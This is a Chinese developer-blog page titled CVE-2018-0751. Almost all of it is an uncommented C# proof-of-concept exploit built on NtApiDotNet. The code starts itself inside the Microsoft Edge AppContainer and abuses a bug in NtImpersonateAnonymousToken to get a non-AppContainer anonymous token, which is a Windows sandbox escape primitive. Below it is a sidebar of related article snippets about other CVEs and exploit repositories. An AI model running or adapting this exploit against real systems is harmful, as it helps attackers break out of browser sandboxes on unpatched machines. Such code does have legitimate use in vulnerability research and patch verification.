CVE-2018-0751

最新推荐文章于 2024-07-19 10:16:37 发布
最新推荐文章于 2024-07-19 10:16:37 发布
阅读量1.4k 收藏
点赞数 
using NtApiDotNet;
using SandboxAnalysisUtils;
using System;
using System.Reflection;
using System.Windows.Forms;

namespace PoC
{
    static class Program
    {
        static NtToken GetProcessToken()
        {
            return NtProcess.Current.OpenToken();
        }

        static bool IsAppContainer()
        {
            using (NtToken token = GetProcessToken())
            {
                return token.AppContainer;
            }
        }

        static NtToken GetLinkedToken()
        {
            using (NtToken token = GetProcessToken())
            {
                return token.GetLinkedToken();
            }
        }
        
        static void FixAssemblyPerms(Assembly asm, Sid ac_sid)
        {
            using (NtFile file = NtFile.Open(NtFileUtils.DosFileNameToNt(asm.Location), 
                null, FileAccessRights.ReadControl | FileAccessRights.WriteDac, FileShareMode.Read, FileOpenOptions.NonDirectoryFile))
            {
                bool found_ac = false;

                var sd = file.SecurityDescriptor;
                foreach (var ace in sd.Dacl)
                {
                    if (ace.Sid == ac_sid)
                    {
                        found_ac = true;
                    }
                }
                if (!found_ac)
                {
                    sd.Dacl.AddAccessAllowedAce(FileAccessRights.GenericAll, ac_sid);
                    sd.Dacl = sd.Dacl.Canonicalize();
                    file.SetSecurityDescriptor(sd, SecurityInformation.Dacl);
                }
            }
        }

        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main(string[] args)
        {
            try
            {
                if (IsAppContainer())
                {
                    // Use bug in NtImpersonateAnonymousToken to get normal anonymous token
                    using (NtToken linked_token = GetLinkedToken())
                    {
                        using (linked_token.Impersonate())
                        {
                            using (NtThread.Current.ImpersonateAnonymousToken())
                            {
                                using (NtToken anon_token = NtToken.OpenThreadToken(NtThread.Current, false, false))
                                {
                                    if (anon_token.AppContainer)
                                    {
                                        MessageBox.Show("Error: Impersonated AC Anonymous Token", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
                                    }
                                    else
                                    {
                                        MessageBox.Show("Success: Impersonated Non-AC Anonymous Token", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
                                    }
                                }
                            }
                        }
                    }
                }
                else
                {
                    using (NtToken token = NtToken.OpenProcessToken())
                    {
                        if (token.ElevationType != TokenElevationType.Limited)
                        {
                            throw new Exception("This PoC must be run as a limited split-token admin to work");
                        }
                    }

                    Sid ac_sid = TokenUtils.DerivePackageSidFromName("microsoft.microsoftedge_8wekyb3d8bbwe");
                    // Ensure all the assemblies can be accessed from the AC.
                    FixAssemblyPerms(typeof(Program).Assembly, ac_sid);
                    FixAssemblyPerms(typeof(NtFile).Assembly, ac_sid);
                    FixAssemblyPerms(typeof(Win32Process).Assembly, ac_sid);

                    Win32ProcessConfig config = new Win32ProcessConfig
                    {
                        CommandLine = typeof(Program).Assembly.Location,
                        AppContainerSid = ac_sid
                    };

                    if (args.Length > 0)
                    {
                        // This is a typical list of capability sids taken from MicrosoftEdgeCP.exe
                        config.Capabilities.Add(new Sid("S-1-15-3-1"));
                        config.Capabilities.Add(new Sid("S-1-15-3-9"));
                        config.Capabilities.Add(new Sid("S-1-15-3-3215430884-1339816292-89257616-1145831019"));
                        config.Capabilities.Add(new Sid("S-1-15-3-787448254-1207972858-3558633622-1059886964"));
                        config.Capabilities.Add(new Sid("S-1-15-3-3845273463-1331427702-1186551195-1148109977"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-3623855041-1826999956-3747069818-3525260223-3747374510-1746272624-950601168-56556331"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-1502825166-1963708345-2616377461-2562897074-4192028372-3968301570-1997628692-1435953622"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-3203351429-2120443784-2872670797-1918958302-2829055647-4275794519-765664414-2751773334"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-1788129303-2183208577-3999474272-3147359985-1757322193-3815756386-151582180-1888101193"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-126078593-3658686728-1984883306-821399696-3684079960-564038680-3414880098-3435825201"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-1692970155-4054893335-185714091-3362601943-3526593181-1159816984-2199008581-497492991"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-220022770-701261984-3991292956-4208751020-2918293058-3396419331-1700932348-2078364891"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-528118966-3876874398-709513571-1907873084-3598227634-3698730060-278077788-3990600205"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-1864111754-776273317-3666925027-2523908081-3792458206-3582472437-4114419977-1582884857"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-2922296261-1647482768-2017091146-3858667068-4135663662-2931985894-1627820925-818366431"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-4092130000-472000003-1670882671-259370826-3862510858-3415016346-1868891083-3396446831"));
                        config.Capabilities.Add(new Sid("S-1-15-3-1024-2440306377-3304611049-1494399071-1161926223-163912384-1437065773-1456820560-2390158196"));
                        config.Capabilities.Add(new Sid("S-1-15-3-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194"));
                        config.LowPrivilegeAppContainer = true;
                    }

                    using (var process = Win32Process.CreateProcess(config))
                    {
                        process.Process.Wait();
                        int status = process.Process.ExitStatus;
                        if (status != 0)
                        {
                            MessageBox.Show(String.Format("Non-Zero Exit Code {0}", status), 
                                "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }
    }
}

王cb
关注
CVE2019_0708
weixin_45383720的博客
11-12 538
CVE2019_0708是目前2019年最具危害性的漏洞CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。 漏洞利用的poc import socket, sys, struct...
突然耗尽C盘空间资源
热门推荐
zglcl008的专栏
02-28 1万+
扫描结果----------------------C:/Documents and Settings/ibmuser/Local Settings/Application Data/S-1-5-31-1286970278978-5713669491-166975984-320/Rotinom/RECYCLER.exe 蠕虫病毒(Worm.Generic.221028) 已删除C:/Documen
nhttpd 目录遍历 (CVE-2011-0751
最新发布
qq_23003811的博客
07-19 222
nhttpd(又名 Nostromo 网络服务器)中的目录遍历漏洞允许远程攻击者通过 URI 中的 ..%2f(编码点点斜线)执行任意程序或读取任意文件,在其根目录下访问/..%2flogs/access_log,即可查看log。Nostromo nhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。
win7文件夹属性中出现未知账户处理方法
兴来每独往
05-12 8972
计算机在当前系统之前安装过一次或多次系统,并且在使用以前的系统时使用用户账户建立并设置了文件或文件夹的所有者。 由于NTFS文件系统的特性,之前的这些信息被保存到了现在使用的系统中,所以你会在该文件夹的“安全”属性中看到一个未知帐户。 方法一: 1.右键单击要调整的文件夹,并选择“属性”选项; 2.单击属性对话框的“安全”选项卡,并单击“高级”按钮; 3.在高级安全设置对话框...
对未标记为可安全执行的脚本_因Edge文件权限与IE发生冲突可导致XXE攻击
weixin_39603598的博客
12-04 314
安全研究员John Page在3月27日向发现了微软的一个XXE漏洞并向其报告了具体情况,随后于4月10日发布了漏洞详情。目前,虽然微软还未修复该漏洞,但已发布了一个微密码,可拒绝远程攻击者泄漏本地文件以及限制在本机上的活动。关于该漏洞,研究人员专门发布了一个视频用于展示如何利用:https://v.qq.com/x/page/m0862vlfmj3.html漏洞简介当用户在打开使用Edge浏览器...
2018尚硅谷1024全套视频
11-05
2018尚硅谷1024全套视频
删除惹眼的未知帐户 在设置共享时 共享和安全里
06-05 3390
       计算机本来是设有共享目录的,远程访问共享的用户只给了只读的权限。在一次重新安装系统之后,打开共享和安全——安全标签里,多了几个未知帐户,账户名是“未知帐户(S-1-5-21-682003330-2139871995-725345543-500)”。挺惹眼的。于是删除,出现错误提示:【因为未知帐户(S-1-5-21-682003330-2139871995-725345543-500)
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
windows2003未知帐户的删除
11-27
文件夹属性安全选项卡里面未知用户的删除,解除您的烦恼!
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞(CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个...
1024程序员节最新福利之2018最全大数据资料集合
weixin_33936401的博客
10-26 8437
前言 有好久没有写博客了,主要这段时间都沉迷学习无法自拔了,哈哈.自吹一波. 前两天不是1024节吗,所以就有很多福利出现了,当然每个人能都获得的信息都有所不同,这就是所谓的信息差.秉着好东西需要分享和开源的好习惯,所以来给你们送福利了. 其他福利 一、1024程序员节最新福利之2018最全java资料集合 二、1024程序员节最新福利之2018最全H5前端资料集 三、1024程序员节最新...
1024程序员节最新福利之2018最全Android资料集合
weixin_34109408的博客
10-26 1481
前言 有好久没有写博客了,主要这段时间都沉迷学习无法自拔了,哈哈.自吹一波. 前两天不是1024节吗,所以就有很多福利出现了,当然每个人能都获得的信息都有所不同,这就是所谓的信息差.秉着好东西需要分享和开源的好习惯,所以来给你们送福利了.其他福利 一、1024程序员节最新福利之2018最全java资料集合 二、1024程序员节最新福利之...
账户管理命令分析
rxh1234567的博客
01-09 1328
1)useradd   作用:创建新账号  参数:-d 设置用户家目录;-e 用YYYYY-MM-DD格式指定一个账户过期日期;-f 指定帐户失效日期 ;-g 指定用户登录组的GID或组名;-G 指定一个或多个附加组;-m 创建用户HOME目录;-M 不创建用户家目录;-p 为用户账户指定默认密码;-s 指定登录shell类型;-u 为账户指定一个唯一的UID。 2)userdel   作用:删除用户  参数:-r 删除用户与家目录。 3)groupadd   作用:创建用户组  参数:-g 指定GID。
win7 删除 未知账户(s-1-5-21-2000478354
weixin_30814329的博客
04-27 3145
下面的我觉得是最佳版本解决方法: -------------------------------------------------------------------------------------------------------------------------------- 未知账户(s-1-5-21-2000478354-1390067357-725345543-1...
1024程序员节最新福利之2018最全java资料集合
weixin_34082177的博客
10-26 7919
前言 有好久没有写博客了,主要这段时间都沉迷学习无法自拔了,哈哈.自吹一波. 前两天不是1024节吗,所以就有很多福利出现了,当然每个人能都获得的信息都有所不同,这就是所谓的信息差.秉着好东西需要分享和开源的好习惯,所以来给你们送福利了. 其他福利 一、1024程序员节最新福利之2018最全Android资料集合 二、1024程序员节最新福利之2018最全H5前端资料集 三、1024程序员...
服务器用户名出现未知账户,删除未知账户,您必须阻止对象继承权限的解决方法...
weixin_42472941的博客
07-30 5968
服务器被入侵,在重新检查服务器安全的时候发现IIS里的权限多了个未知用户,删除未知账户时提示“未知用户....您必须阻止对象继承权限...”。未知帐户是“未知帐户(S-1-5-21-682003330-2139871995-725345543-500)”,删除时出现错误提示:【因为未知帐户(S-1-5-21-682003330-2139871995-725345543-500)”从其父系继承权限,...
CVE-2018-8034
07-28
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title] - *1* [windows Server 2012 R2扫描漏洞处理(CVE-2018-0886,CVE-2016-2183,CVE-2013-2566,CVE-2015-2808)](https://blog.csdn.net/weixin_39945506/article/details/119863457)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [常见主机漏洞](https://blog.csdn.net/weixin_45849370/article/details/102956932)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值